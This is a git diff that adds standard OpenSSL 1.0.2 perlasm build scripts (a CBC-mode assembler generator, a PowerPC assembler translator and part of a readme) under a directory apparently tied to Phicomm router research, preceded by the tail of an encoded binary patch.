z$D9sgJI9<>iA@$}#`>Mfw<P#T-L3KnK+Bc<0_p75_k2?*te9aRr4@CCl@z%}5(?&F
zwl91f8?kbgPb+A5^2N_R7CjinG3B*#@fR?+o_*&}dUm)5D|&kn#~<C=+nAppF=S>W
z0zstIFc79R)INm7EOpd~g()Ux&STcMCQNwb1@alBN~HG4;CUbX>}gWz{tqZcEAGZe
z1g=3kcV+8LbIKs-(cx(E$AYB)a6{ms;o_sHWIwGq_t@yKv+o3pJ5Y@w9r_l&$X&4Q
zBGneYEj$8K*;x-hNz6Br$TtSb^CBfrJbFy1K<tmj*U7Ah1AQ|{LO5IyX#w`+0TLjY
zzb{O2E(y*01~q6gX}v}{5@JyK08EB9uty_uX!wRyz-pj_4h1|7%*a0#ew%t&`^6HM
zyY5+RODeyTnQr7C43B{9h12jN2c+Xob{HWX^AJOlp0T-)U_q(fg|;NIV?k-jycxbs
z5Yjvmy(q(r=i|o>>jMFU_(G!%L})TRg2axpXgF1IEFmb^C^?Cdv)$;Vy=Chj^1_&P
zoNfId1<w1#$bBt(aKwU7<LIgq0l4me(Pp#tJ#tBMRN=bt__3s*FI*JfO6v|&mU6*B
zSHL-tnB<=mxdOICaaxvE88yA-UrB?EFH$l@DWd1^^$om$-YRHeRG|i1xjs0qVeOsZ
zyWd8)@x?mw9QhDT_c~xwD5UzpdXx5qTkSoe@9#l@gRKYaj(iNMfbHyAlzn=(T(w?C
z4V<X8(ql$Gj@_Kb#>)<c!lFrsMFV{cz*x^OK28>$F8mT2AsLWo7hpVMA}t!|I|IaI
z)#=izp)u`Ym;RW9M|=wz);=+I@wE5LWpTj~=o>_%xXTFi(ai}tAl<W&oWcp=f<n}2
z;iD(Ta4zEBk4`deQoA*llI?#&>Nw^i<u%hTvYJU+$G+m4BT_zdwvf%NvBOK62AOE0
z(zz2ywK~JqC8+#JDMGI^qepOfqFmiRBO$$1s-etk8e+#-c13<p4mgRQ+b&x?+0R9+
z82Q0p%4Kr==&_M{tY|8VC^mAbtYJAkgJ44qc8|wpjq?0M1J#%prOWcZf;N5;+l@T-
zW%r%G+C0P7%O=vx7Q9Ngh^f+kUR|8^9<)gDR^5G>L^0PO*Yp;v&|0j-3n!#cOZe<9
zevA*U3;K^_X5pSsW)&NW_jbI*vOoY8MjUw<$in=}S=zt}w!Hoz8WY&xuqW`0V2ffP
z2udqOMnLNbxK{s$N(ROzA_h};Em%~Dv)21dtmEPcGg^EcsQ{KPvU;QKBf$g31oi`B
z_c`gnpBxq(&$NOp4q;_c?0whR=M59X;${)1H%`^F|5+|wY2@fK>L?wq_s9X~hh;LP
z*Z(&28`~&%q37TZyvE~+*y&Dkuk4<nJU$JryKBvzYt7m=O<TNZ(UqZ^=GIJ?nF-a`
z&aI7H9=#$Xs?mGqL~0}RF1BF|0H4(;twS)@7B6kqV2}b~*ssMy=OTJ4?p~%<YzS7&
zm{#R`01<=w%oHt}c82^C7LjH3B`hYf)8#jW?@h9NJ$PxlKe(;3(I4^{75<>^_W`0l
zWKnwP(4{T(2k)<3=&#=CN%}*1?=}9K`=;pr$hN7vzb;!9^EXts`s)Db{+fmU5D3v>
zq2D(jUH4FbJde{0@XpG(zdG*$*?r!azh)cp$xbB}mguju{sy{uNk%-^dhr^UBTjO}
zC(6<2zr%BhcQQfHHH=@A<h221;&oqT%wL`L(BNP9S3?nyna128=_tn9V?ySgp7Akb
zV{>2Z-%?TeU4I=A$K=tKc<qtAzE58vzu<-W=e-L_e$K1Ov%cbUcu|r^kAs(xOYj=E
z3F%^k8?QR>SSfkkBIU|gF7{X7=YjgSkzKNoYn^97g})}|59!LF=tp{dMD~3NW!ry1
zk@YnCn<}3ZdW0L%+zXQKN&1f4ZhY=S-Wd5%!e2Pmv#oOS$&(*XlZ(QSGCjmUB(XQg
z_&apV`9FQC=h@HU-zj<V^|VD|l+@8fay;megRmzip?lFmNAez!*uA9lMp{$XkY5RX
zID9z<zw)ebG2mtBK9kl1o(Jg#UiVeP2HW7vp)Bkdsod-j!MSapCX&e>62q%~P@b&K
zGwENVC^pGSI68SmG@A&XifSd}qjY<Y#8o{ayIm-8UDj31ib{N`#6{eaWsiuSvLZhX
z_|mwK(FE~`7>4gP_z`}Y^vlPo5l=IIgddQ&h&8}gN_<8Y3V1}^z;_jXME_lhi#P#{
zb`HX?_o0ACtW$jZ@gw}mDTI#WWIMtw>0n|l0((s2Z;3l?Y(%Kj^KbYO{Xa>?h;;>Q
zm&9)&XT&4cgI$ERq>!?%J|0a9semzhDI~*R7iHR|PJTSv)RRC;M5QPb+UVM8GW;_a
z+z<OrMnBU9zsLoj<APJFJ{f<*1z+ZZx4PhKT=2~<_)Zu6M=m&>awe1iMHhU(3x2=_
zKkS0P<AQ(af_t&9CX@4Y7kq{bexVCK+XdHM@M~P~<u3Rt7re&>&${3_7yJh<_)lH%
zf(!n-3tj?#CgMg?8bR%$pSaMUju21u^S)p&UlpfkNIWiawJ+96yh-AUe}lwtchE1F
zc!z^NE%Egd7yBec_=d!f$%I(!c_i9c+TD|GX-{>g+t+vZv}>)M-L0r}tuj|@>w7xP
z^jJ%KcS<y_26?(ilf7EI#>h|vO~;&8`AM~QbZa2(xGSB)V5v3fjauuRj#PVZZ*50!
zPfKk?RC{_`RF#GRf#@fSssT(>O*dRy+t%IHYp(0*UWdLQ29#>;Zr`ZLYLkm1T556f
zx`lc&bzNiQ^7x9>3VmTRp3>sWmZjEZ%v8Fkr@Kc>rFzYlwl%4?)oW6BwsdrAi<aHo
zwBowd+Lq4F?lx`VQpnIX2NRO`ojvI^p<S7^Xfb;Q1qeF2w1tW5QbJK${D!8~l2~fd
zikng$T^**V_pWY<ibAYoRl3(q08gbiFr;~1dyAQ7Kx0Q&OQ)id?AkihEnS&)T5P$V
z>PoK{)J@mMZx$623m85$vMjFcZU>Kb3KjB`e4<xx+Ki^aOYoc6Bx?A(y5a-Ul<<p*
zok5`ym8}<OfV@G7wJ6bK#FvdLVVS-(mTKK-rhB!f_>xq6`p#4vl-vsK3;Le6dEy)I
zYU|m!ZcIVfHN}@MU!F{fnfFTlqy-7rn2k(O852OMjeM#JZU{wR3m>GZ#O$8R9)cp%
z+S$=Y1QY3nJ5C@Fh;Yd<rsI&}GTx1x6e~gcuqb2s;m_RSp;UARez-UkPdD}fdYt$}
z45#y}qW_7+5stKKhQGq-zsT?kBE&=d&%;mgq5Xs&!oP%{!V?S+F}#i8=QI2?#2b2u
zPY6H7XEww6e6M0Sr%$@z?Jl_Kf<NtozwCnl$_4*#7yOtDei<nMk5dl`7yNb?yw?Ta
z?t=e};atxlnSzqpxS!0DICbNGGQ{u@+LRr?CR0|T=lHcQxL2moM9=;9W`<wD_^)C(
z_rq^9ob%bw@CzBAR~a5=_+f_6V)%y)zlh;pnd+1L9Is~hml^#<46kAMRSf6yZ(;bw
zjD9=AFJbtF@`yq5T*~k$!|9Bx>~%fEFK75|46kMQ8ivnicrU{v41a{-+~59%;hg>%
zhSS+p$+?^1T%JP==X#q-2V^{?hdKBuK4FG)y)9rk*IOII=Q2LuWB5FV|1-nse-qWX
zx=iRu9<GO_4CnN>Go0(8m*ITA&olh1Y~0^4oR1ro=U?Y~zf$5PCtvTkGMw}2W;h>r
zC&M}Yiwx)M_ZJN3^I9#><4(Oj%y3Ts7Q?S#dZ?9&vva;*mAG@hH#3~e|0=`ju20$b
zD*;sS5TAPd6n+cCIiDvOekG&-cZOfZ@Lw=|KEsO)znb9{@;pNFEMWNQ4F4L#&vC)$
zGMwxAQHFCp4>O$W;T?%P^?#JnbALNa9*mrJznkG)Z+V96Y+eHl=lVIsaIT+=&qQZD
zG%n{qpW&SU^$h2B`8vb-xLJntai3>6_mh1L=ltJgcmrfr{`MimxqUtI+(+}`>uv_a
zxqY8uIA7PZ<vG!5m$<~8_DwQ+Zr`;G=kwjfa6az$7|!Vn4CnfJh2ea@e`GkH@BFi%
z7(6tu3-D9=T+DFJC(Up!&)p2?{6pYL59x<~>X|1C3YTsv?%=6O;pB7lth7I4_)=Nl
z;=tAY?8^>Z-Ou_e>;}bO-OsLY;Oc&MlLJ@xvoAYvbw4{@PEzq#_p^66aCJZXeFv`Y
zXZJX8bw3-Fd9~uN?qBF1a_CXGy0=~Dz}5Xrp95F-FON8Ib^r2|16TJi1qZI~UtV|M
z>i#7}j>hCv_b*y)@5Z%eODn!+kNsV(N<Hb$mRd8t!PIJTE6}3Vw)XaFwLRTbA@XQ#
zRKp#}+O_E}kaTsM>012h^Kx;QA?vHUGPQI;lI}4#qAM{>uf{pOWo_D)=l}Z-fdRRM
zO!vpwHOSHqxjs~bbRSg}xe=+RVGOYgg|PiSAoCgeP+yq_i!%#RP!3MGR69Z9`MG0U
zg*(T;3=PEd|Jpx_zQl75e*976%XD?DNsX_*4QQcqWQ@Wt{8Gw)sRLL2)Hi{4Rpz88
z{>J&=j81gak;`tJ#o2Z-G>(Xp(!YYgfdY;1>>rZ-4e9ra-r2ts4U^gb0jZE0$(Za<
zx>Wt?%u3H>V-vpm@93>*Z%D_abdw-wf8y!1Js_>&e0pozW=Eq_*A%}UB%<H*(jmSn
KYU3|w|NjLf@406H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/cbc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/cbc.pl
new file mode 100644
index 0000000..24561e7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/cbc.pl
@@ -0,0 +1,349 @@
+#!/usr/local/bin/perl
+
+# void des_ncbc_encrypt(input, output, length, schedule, ivec, enc)
+# des_cblock (*input);
+# des_cblock (*output);
+# long length;
+# des_key_schedule schedule;
+# des_cblock (*ivec);
+# int enc;
+#
+# calls 
+# des_encrypt((DES_LONG *)tin,schedule,DES_ENCRYPT);
+#
+
+#&cbc("des_ncbc_encrypt","des_encrypt",0);
+#&cbc("BF_cbc_encrypt","BF_encrypt","BF_encrypt",
+#	1,4,5,3,5,-1);
+#&cbc("des_ncbc_encrypt","des_encrypt","des_encrypt",
+#	0,4,5,3,5,-1);
+#&cbc("des_ede3_cbc_encrypt","des_encrypt3","des_decrypt3",
+#	0,6,7,3,4,5);
+#
+# When doing a cipher that needs bigendian order,
+# for encrypt, the iv is kept in bigendian form,
+# while for decrypt, it is kept in little endian.
+sub cbc
+	{
+	local($name,$enc_func,$dec_func,$swap,$iv_off,$enc_off,$p1,$p2,$p3)=@_;
+	# name is the function name
+	# enc_func and dec_func and the functions to call for encrypt/decrypt
+	# swap is true if byte order needs to be reversed
+	# iv_off is parameter number for the iv 
+	# enc_off is parameter number for the encrypt/decrypt flag
+	# p1,p2,p3 are the offsets for parameters to be passed to the
+	# underlying calls.
+
+	&function_begin_B($name,"");
+	&comment("");
+
+	$in="esi";
+	$out="edi";
+	$count="ebp";
+
+	&push("ebp");
+	&push("ebx");
+	&push("esi");
+	&push("edi");
+
+	$data_off=4;
+	$data_off+=4 if ($p1 > 0);
+	$data_off+=4 if ($p2 > 0);
+	$data_off+=4 if ($p3 > 0);
+
+	&mov($count,	&wparam(2));	# length
+
+	&comment("getting iv ptr from parameter $iv_off");
+	&mov("ebx",	&wparam($iv_off));	# Get iv ptr
+
+	&mov($in,	&DWP(0,"ebx","",0));#	iv[0]
+	&mov($out,	&DWP(4,"ebx","",0));#	iv[1]
+
+	&push($out);
+	&push($in);
+	&push($out);	# used in decrypt for iv[1]
+	&push($in);	# used in decrypt for iv[0]
+
+	&mov("ebx",	"esp");		# This is the address of tin[2]
+
+	&mov($in,	&wparam(0));	# in
+	&mov($out,	&wparam(1));	# out
+
+	# We have loaded them all, how lets push things
+	&comment("getting encrypt flag from parameter $enc_off");
+	&mov("ecx",	&wparam($enc_off));	# Get enc flag
+	if ($p3 > 0)
+		{
+		&comment("get and push parameter $p3");
+		if ($enc_off != $p3)
+			{ &mov("eax",	&wparam($p3)); &push("eax"); }
+		else	{ &push("ecx"); }
+		}
+	if ($p2 > 0)
+		{
+		&comment("get and push parameter $p2");
+		if ($enc_off != $p2)
+			{ &mov("eax",	&wparam($p2)); &push("eax"); }
+		else	{ &push("ecx"); }
+		}
+	if ($p1 > 0)
+		{
+		&comment("get and push parameter $p1");
+		if ($enc_off != $p1)
+			{ &mov("eax",	&wparam($p1)); &push("eax"); }
+		else	{ &push("ecx"); }
+		}
+	&push("ebx");		# push data/iv
+
+	&cmp("ecx",0);
+	&jz(&label("decrypt"));
+
+	&and($count,0xfffffff8);
+	&mov("eax",	&DWP($data_off,"esp","",0));	# load iv[0]
+	&mov("ebx",	&DWP($data_off+4,"esp","",0));	# load iv[1]
+
+	&jz(&label("encrypt_finish"));
+
+	#############################################################
+
+	&set_label("encrypt_loop");
+	# encrypt start 
+	# "eax" and "ebx" hold iv (or the last cipher text)
+
+	&mov("ecx",	&DWP(0,$in,"",0));	# load first 4 bytes
+	&mov("edx",	&DWP(4,$in,"",0));	# second 4 bytes
+
+	&xor("eax",	"ecx");
+	&xor("ebx",	"edx");
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov(&DWP($data_off,"esp","",0),	"eax");	# put in array for call
+	&mov(&DWP($data_off+4,"esp","",0),	"ebx");	#
+
+	&call($enc_func);
+
+	&mov("eax",	&DWP($data_off,"esp","",0));
+	&mov("ebx",	&DWP($data_off+4,"esp","",0));
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov(&DWP(0,$out,"",0),"eax");
+	&mov(&DWP(4,$out,"",0),"ebx");
+
+	# eax and ebx are the next iv.
+
+	&add($in,	8);
+	&add($out,	8);
+
+	&sub($count,	8);
+	&jnz(&label("encrypt_loop"));
+
+###################################################################3
+	&set_label("encrypt_finish");
+	&mov($count,	&wparam(2));	# length
+	&and($count,	7);
+	&jz(&label("finish"));
+	&call(&label("PIC_point"));
+&set_label("PIC_point");
+	&blindpop("edx");
+	&lea("ecx",&DWP(&label("cbc_enc_jmp_table")."-".&label("PIC_point"),"edx"));
+	&mov($count,&DWP(0,"ecx",$count,4));
+	&add($count,"edx");
+	&xor("ecx","ecx");
+	&xor("edx","edx");
+	#&mov($count,&DWP(&label("cbc_enc_jmp_table"),"",$count,4));
+	&jmp_ptr($count);
+
+&set_label("ej7");
+	&movb(&HB("edx"),	&BP(6,$in,"",0));
+	&shl("edx",8);
+&set_label("ej6");
+	&movb(&HB("edx"),	&BP(5,$in,"",0));
+&set_label("ej5");
+	&movb(&LB("edx"),	&BP(4,$in,"",0));
+&set_label("ej4");
+	&mov("ecx",		&DWP(0,$in,"",0));
+	&jmp(&label("ejend"));
+&set_label("ej3");
+	&movb(&HB("ecx"),	&BP(2,$in,"",0));
+	&shl("ecx",8);
+&set_label("ej2");
+	&movb(&HB("ecx"),	&BP(1,$in,"",0));
+&set_label("ej1");
+	&movb(&LB("ecx"),	&BP(0,$in,"",0));
+&set_label("ejend");
+
+	&xor("eax",	"ecx");
+	&xor("ebx",	"edx");
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov(&DWP($data_off,"esp","",0),	"eax");	# put in array for call
+	&mov(&DWP($data_off+4,"esp","",0),	"ebx");	#
+
+	&call($enc_func);
+
+	&mov("eax",	&DWP($data_off,"esp","",0));
+	&mov("ebx",	&DWP($data_off+4,"esp","",0));
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov(&DWP(0,$out,"",0),"eax");
+	&mov(&DWP(4,$out,"",0),"ebx");
+
+	&jmp(&label("finish"));
+
+	#############################################################
+	#############################################################
+	&set_label("decrypt",1);
+	# decrypt start 
+	&and($count,0xfffffff8);
+	# The next 2 instructions are only for if the jz is taken
+	&mov("eax",	&DWP($data_off+8,"esp","",0));	# get iv[0]
+	&mov("ebx",	&DWP($data_off+12,"esp","",0));	# get iv[1]
+	&jz(&label("decrypt_finish"));
+
+	&set_label("decrypt_loop");
+	&mov("eax",	&DWP(0,$in,"",0));	# load first 4 bytes
+	&mov("ebx",	&DWP(4,$in,"",0));	# second 4 bytes
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov(&DWP($data_off,"esp","",0),	"eax");	# put back
+	&mov(&DWP($data_off+4,"esp","",0),	"ebx");	#
+
+	&call($dec_func);
+
+	&mov("eax",	&DWP($data_off,"esp","",0));	# get return
+	&mov("ebx",	&DWP($data_off+4,"esp","",0));	#
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov("ecx",	&DWP($data_off+8,"esp","",0));	# get iv[0]
+	&mov("edx",	&DWP($data_off+12,"esp","",0));	# get iv[1]
+
+	&xor("ecx",	"eax");
+	&xor("edx",	"ebx");
+
+	&mov("eax",	&DWP(0,$in,"",0));	# get old cipher text,
+	&mov("ebx",	&DWP(4,$in,"",0));	# next iv actually
+
+	&mov(&DWP(0,$out,"",0),"ecx");
+	&mov(&DWP(4,$out,"",0),"edx");
+
+	&mov(&DWP($data_off+8,"esp","",0),	"eax");	# save iv
+	&mov(&DWP($data_off+12,"esp","",0),	"ebx");	#
+
+	&add($in,	8);
+	&add($out,	8);
+
+	&sub($count,	8);
+	&jnz(&label("decrypt_loop"));
+############################ ENDIT #######################3
+	&set_label("decrypt_finish");
+	&mov($count,	&wparam(2));	# length
+	&and($count,	7);
+	&jz(&label("finish"));
+
+	&mov("eax",	&DWP(0,$in,"",0));	# load first 4 bytes
+	&mov("ebx",	&DWP(4,$in,"",0));	# second 4 bytes
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov(&DWP($data_off,"esp","",0),	"eax");	# put back
+	&mov(&DWP($data_off+4,"esp","",0),	"ebx");	#
+
+	&call($dec_func);
+
+	&mov("eax",	&DWP($data_off,"esp","",0));	# get return
+	&mov("ebx",	&DWP($data_off+4,"esp","",0));	#
+
+	&bswap("eax")	if $swap;
+	&bswap("ebx")	if $swap;
+
+	&mov("ecx",	&DWP($data_off+8,"esp","",0));	# get iv[0]
+	&mov("edx",	&DWP($data_off+12,"esp","",0));	# get iv[1]
+
+	&xor("ecx",	"eax");
+	&xor("edx",	"ebx");
+
+	# this is for when we exit
+	&mov("eax",	&DWP(0,$in,"",0));	# get old cipher text,
+	&mov("ebx",	&DWP(4,$in,"",0));	# next iv actually
+
+&set_label("dj7");
+	&rotr("edx",	16);
+	&movb(&BP(6,$out,"",0),	&LB("edx"));
+	&shr("edx",16);
+&set_label("dj6");
+	&movb(&BP(5,$out,"",0),	&HB("edx"));
+&set_label("dj5");
+	&movb(&BP(4,$out,"",0),	&LB("edx"));
+&set_label("dj4");
+	&mov(&DWP(0,$out,"",0),	"ecx");
+	&jmp(&label("djend"));
+&set_label("dj3");
+	&rotr("ecx",	16);
+	&movb(&BP(2,$out,"",0),	&LB("ecx"));
+	&shl("ecx",16);
+&set_label("dj2");
+	&movb(&BP(1,$in,"",0),	&HB("ecx"));
+&set_label("dj1");
+	&movb(&BP(0,$in,"",0),	&LB("ecx"));
+&set_label("djend");
+
+	# final iv is still in eax:ebx
+	&jmp(&label("finish"));
+
+
+############################ FINISH #######################3
+	&set_label("finish",1);
+	&mov("ecx",	&wparam($iv_off));	# Get iv ptr
+
+	#################################################
+	$total=16+4;
+	$total+=4 if ($p1 > 0);
+	$total+=4 if ($p2 > 0);
+	$total+=4 if ($p3 > 0);
+	&add("esp",$total);
+
+	&mov(&DWP(0,"ecx","",0),	"eax");	# save iv
+	&mov(&DWP(4,"ecx","",0),	"ebx");	# save iv
+
+	&function_end_A($name);
+
+	&align(64);
+	&set_label("cbc_enc_jmp_table");
+	&data_word("0");
+	&data_word(&label("ej1")."-".&label("PIC_point"));
+	&data_word(&label("ej2")."-".&label("PIC_point"));
+	&data_word(&label("ej3")."-".&label("PIC_point"));
+	&data_word(&label("ej4")."-".&label("PIC_point"));
+	&data_word(&label("ej5")."-".&label("PIC_point"));
+	&data_word(&label("ej6")."-".&label("PIC_point"));
+	&data_word(&label("ej7")."-".&label("PIC_point"));
+	# not used
+	#&set_label("cbc_dec_jmp_table",1);
+	#&data_word("0");
+	#&data_word(&label("dj1")."-".&label("PIC_point"));
+	#&data_word(&label("dj2")."-".&label("PIC_point"));
+	#&data_word(&label("dj3")."-".&label("PIC_point"));
+	#&data_word(&label("dj4")."-".&label("PIC_point"));
+	#&data_word(&label("dj5")."-".&label("PIC_point"));
+	#&data_word(&label("dj6")."-".&label("PIC_point"));
+	#&data_word(&label("dj7")."-".&label("PIC_point"));
+	&align(64);
+
+	&function_end_B($name);
+	
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/ppc-xlate.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/ppc-xlate.pl
new file mode 100755
index 0000000..f89e814
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/ppc-xlate.pl
@@ -0,0 +1,226 @@
+#!/usr/bin/env perl
+
+# PowerPC assembler distiller by <appro>.
+
+my $flavour = shift;
+my $output = shift;
+open STDOUT,">$output" || die "can't open $output: $!";
+
+my %GLOBALS;
+my $dotinlocallabels=($flavour=~/linux/)?1:0;
+
+################################################################
+# directives which need special treatment on different platforms
+################################################################
+my $globl = sub {
+    my $junk = shift;
+    my $name = shift;
+    my $global = \$GLOBALS{$name};
+    my $ret;
+
+    $name =~ s|^[\.\_]||;
+ 
+    SWITCH: for ($flavour) {
+	/aix/		&& do { $name = ".$name";
+				last;
+			      };
+	/osx/		&& do { $name = "_$name";
+				last;
+			      };
+	/linux.*(32|64le)/
+			&& do {	$ret .= ".globl	$name\n";
+				$ret .= ".type	$name,\@function";
+				last;
+			      };
+	/linux.*64/	&& do {	$ret .= ".globl	$name\n";
+				$ret .= ".type	$name,\@function\n";
+				$ret .= ".section	\".opd\",\"aw\"\n";
+				$ret .= ".align	3\n";
+				$ret .= "$name:\n";
+				$ret .= ".quad	.$name,.TOC.\@tocbase,0\n";
+				$ret .= ".previous\n";
+
+				$name = ".$name";
+				last;
+			      };
+    }
+
+    $ret = ".globl	$name" if (!$ret);
+    $$global = $name;
+    $ret;
+};
+my $text = sub {
+    my $ret = ($flavour =~ /aix/) ? ".csect\t.text[PR],7" : ".text";
+    $ret = ".abiversion	2\n".$ret	if ($flavour =~ /linux.*64le/);
+    $ret;
+};
+my $machine = sub {
+    my $junk = shift;
+    my $arch = shift;
+    if ($flavour =~ /osx/)
+    {	$arch =~ s/\"//g;
+	$arch = ($flavour=~/64/) ? "ppc970-64" : "ppc970" if ($arch eq "any");
+    }
+    ".machine	$arch";
+};
+my $size = sub {
+    if ($flavour =~ /linux/)
+    {	shift;
+	my $name = shift; $name =~ s|^[\.\_]||;
+	my $ret  = ".size	$name,.-".($flavour=~/64$/?".":"").$name;
+	$ret .= "\n.size	.$name,.-.$name" if ($flavour=~/64$/);
+	$ret;
+    }
+    else
+    {	"";	}
+};
+my $asciz = sub {
+    shift;
+    my $line = join(",",@_);
+    if ($line =~ /^"(.*)"$/)
+    {	".byte	" . join(",",unpack("C*",$1),0) . "\n.align	2";	}
+    else
+    {	"";	}
+};
+my $quad = sub {
+    shift;
+    my @ret;
+    my ($hi,$lo);
+    for (@_) {
+	if (/^0x([0-9a-f]*?)([0-9a-f]{1,8})$/io)
+	{  $hi=$1?"0x$1":"0"; $lo="0x$2";  }
+	elsif (/^([0-9]+)$/o)
+	{  $hi=$1>>32; $lo=$1&0xffffffff;  } # error-prone with 32-bit perl
+	else
+	{  $hi=undef; $lo=$_; }
+
+	if (defined($hi))
+	{  push(@ret,$flavour=~/le$/o?".long\t$lo,$hi":".long\t$hi,$lo");  }
+	else
+	{  push(@ret,".quad	$lo");  }
+    }
+    join("\n",@ret);
+};
+
+################################################################
+# simplified mnemonics not handled by at least one assembler
+################################################################
+my $cmplw = sub {
+    my $f = shift;
+    my $cr = 0; $cr = shift if ($#_>1);
+    # Some out-of-date 32-bit GNU assembler just can't handle cmplw...
+    ($flavour =~ /linux.*32/) ?
+	"	.long	".sprintf "0x%x",31<<26|$cr<<23|$_[0]<<16|$_[1]<<11|64 :
+	"	cmplw	".join(',',$cr,@_);
+};
+my $bdnz = sub {
+    my $f = shift;
+    my $bo = $f=~/[\+\-]/ ? 16+9 : 16;	# optional "to be taken" hint
+    "	bc	$bo,0,".shift;
+} if ($flavour!~/linux/);
+my $bltlr = sub {
+    my $f = shift;
+    my $bo = $f=~/\-/ ? 12+2 : 12;	# optional "not to be taken" hint
+    ($flavour =~ /linux/) ?		# GNU as doesn't allow most recent hints
+	"	.long	".sprintf "0x%x",19<<26|$bo<<21|16<<1 :
+	"	bclr	$bo,0";
+};
+my $bnelr = sub {
+    my $f = shift;
+    my $bo = $f=~/\-/ ? 4+2 : 4;	# optional "not to be taken" hint
+    ($flavour =~ /linux/) ?		# GNU as doesn't allow most recent hints
+	"	.long	".sprintf "0x%x",19<<26|$bo<<21|2<<16|16<<1 :
+	"	bclr	$bo,2";
+};
+my $beqlr = sub {
+    my $f = shift;
+    my $bo = $f=~/-/ ? 12+2 : 12;	# optional "not to be taken" hint
+    ($flavour =~ /linux/) ?		# GNU as doesn't allow most recent hints
+	"	.long	".sprintf "0x%X",19<<26|$bo<<21|2<<16|16<<1 :
+	"	bclr	$bo,2";
+};
+# GNU assembler can't handle extrdi rA,rS,16,48, or when sum of last two
+# arguments is 64, with "operand out of range" error.
+my $extrdi = sub {
+    my ($f,$ra,$rs,$n,$b) = @_;
+    $b = ($b+$n)&63; $n = 64-$n;
+    "	rldicl	$ra,$rs,$b,$n";
+};
+my $vmr = sub {
+    my ($f,$vx,$vy) = @_;
+    "	vor	$vx,$vy,$vy";
+};
+
+# PowerISA 2.06 stuff
+sub vsxmem_op {
+    my ($f, $vrt, $ra, $rb, $op) = @_;
+    "	.long	".sprintf "0x%X",(31<<26)|($vrt<<21)|($ra<<16)|($rb<<11)|($op*2+1);
+}
+# made-up unaligned memory reference AltiVec/VMX instructions
+my $lvx_u	= sub {	vsxmem_op(@_, 844); };	# lxvd2x
+my $stvx_u	= sub {	vsxmem_op(@_, 972); };	# stxvd2x
+my $lvdx_u	= sub {	vsxmem_op(@_, 588); };	# lxsdx
+my $stvdx_u	= sub {	vsxmem_op(@_, 716); };	# stxsdx
+my $lvx_4w	= sub { vsxmem_op(@_, 780); };	# lxvw4x
+my $stvx_4w	= sub { vsxmem_op(@_, 908); };	# stxvw4x
+
+# PowerISA 2.07 stuff
+sub vcrypto_op {
+    my ($f, $vrt, $vra, $vrb, $op) = @_;
+    "	.long	".sprintf "0x%X",(4<<26)|($vrt<<21)|($vra<<16)|($vrb<<11)|$op;
+}
+my $vcipher	= sub { vcrypto_op(@_, 1288); };
+my $vcipherlast	= sub { vcrypto_op(@_, 1289); };
+my $vncipher	= sub { vcrypto_op(@_, 1352); };
+my $vncipherlast= sub { vcrypto_op(@_, 1353); };
+my $vsbox	= sub { vcrypto_op(@_, 0, 1480); };
+my $vshasigmad	= sub { my ($st,$six)=splice(@_,-2); vcrypto_op(@_, $st<<4|$six, 1730); };
+my $vshasigmaw	= sub { my ($st,$six)=splice(@_,-2); vcrypto_op(@_, $st<<4|$six, 1666); };
+my $vpmsumb	= sub { vcrypto_op(@_, 1032); };
+my $vpmsumd	= sub { vcrypto_op(@_, 1224); };
+my $vpmsubh	= sub { vcrypto_op(@_, 1096); };
+my $vpmsumw	= sub { vcrypto_op(@_, 1160); };
+my $vaddudm	= sub { vcrypto_op(@_, 192);  };
+
+my $mtsle	= sub {
+    my ($f, $arg) = @_;
+    "	.long	".sprintf "0x%X",(31<<26)|($arg<<21)|(147*2);
+};
+
+while($line=<>) {
+
+    $line =~ s|[#!;].*$||;	# get rid of asm-style comments...
+    $line =~ s|/\*.*\*/||;	# ... and C-style comments...
+    $line =~ s|^\s+||;		# ... and skip white spaces in beginning...
+    $line =~ s|\s+$||;		# ... and at the end
+
+    {
+	$line =~ s|\b\.L(\w+)|L$1|g;	# common denominator for Locallabel
+	$line =~ s|\bL(\w+)|\.L$1|g	if ($dotinlocallabels);
+    }
+
+    {
+	$line =~ s|(^[\.\w]+)\:\s*||;
+	my $label = $1;
+	if ($label) {
+	    printf "%s:",($GLOBALS{$label} or $label);
+	    printf "\n.localentry\t$GLOBALS{$label},0"	if ($GLOBALS{$label} && $flavour =~ /linux.*64le/);
+	}
+    }
+
+    {
+	$line =~ s|^\s*(\.?)(\w+)([\.\+\-]?)\s*||;
+	my $c = $1; $c = "\t" if ($c eq "");
+	my $mnemonic = $2;
+	my $f = $3;
+	my $opcode = eval("\$$mnemonic");
+	$line =~ s/\b(c?[rf]|v|vs)([0-9]+)\b/$2/g if ($c ne "." and $flavour !~ /osx/);
+	if (ref($opcode) eq 'CODE') { $line = &$opcode($f,split(',',$line)); }
+	elsif ($mnemonic)           { $line = $c.$mnemonic.$f."\t".$line; }
+    }
+
+    print $line if ($line);
+    print "\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/readme b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/readme
new file mode 100644
index 0000000..f02bbee
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/readme
@@ -0,0 +1,124 @@
+The perl scripts in this directory are my 'hack' to generate
+multiple different assembler formats via the one origional script.
+
+The way to use this library is to start with adding the path to this directory
+and then include it.
+
+push(@INC,"perlasm","../../perlasm");
+require "x86asm.pl";
+
+The first thing we do is setup the file and type of assember
+
